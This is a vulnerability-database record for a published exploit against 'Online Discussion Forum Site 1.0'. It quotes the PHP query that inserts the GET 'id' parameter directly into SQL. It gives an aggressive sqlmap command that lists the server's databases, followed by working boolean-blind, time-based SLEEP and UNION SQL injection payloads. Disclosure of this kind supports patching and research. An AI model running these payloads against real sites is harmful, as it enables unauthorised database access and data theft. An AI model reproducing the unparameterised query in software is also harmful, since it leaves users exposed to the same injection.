DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:167200", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Online Discussion Forum Site 1.0 SQL Injection", "description": "", "published": "2022-05-17T00:00:00", "modified": "2022-05-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/167200/Online-Discussion-Forum-Site-1.0-SQL-Injection.html", "reporter": "Saud Alenazi", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-05-17T17:37:54", "viewCount": 51, "enchantments": {"vulnersScore": "PENDING"}, "_state": {}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/167200/odfs10-sql.txt", "sourceData": "`# Exploit Title: Online Discussion Forum Site 1.0 - 'id' Blind SQL Injection \n# Date: 15/05/2022 \n# Exploit Author: Saud Alenazi \n# Vendor Homepage: https://www.sourcecodester.com/ \n# Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html \n# Version: 1.0 \n# Tested on: XAMPP, Linux \n \n \n# Vulnerable Code: \n \nline 3 in file \"/odfs/posts/view_post.php\" \n \n$qry = $conn->query(\"SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'\"); \n \n# Sqlmap command: \n \nsqlmap -u 'http://localhost/odfs/?id=1&p=posts/view_post' -p id --level=5 --risk=3 --dbs --random-agent --eta \n \n# Output: \n \nParameter: id (GET) \nType: boolean-based blind \nTitle: AND boolean-based blind - WHERE or HAVING clause \nPayload: id=1' AND 5178=5178-- Iddj&p=posts/view_post \n \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: id=1' AND (SELECT 6535 FROM (SELECT(SLEEP(5)))amvG)-- ikmN&p=posts/view_post \n \nType: UNION query \nTitle: Generic UNION query (NULL) - 12 columns \nPayload: id=-3669' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71716a7671,0x65776b4d4272577956694c6549674a64546761564c79566d556255634a426c7a66464e6e527a4779,0x71767a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&p=posts/view_post \n`\n"}

{}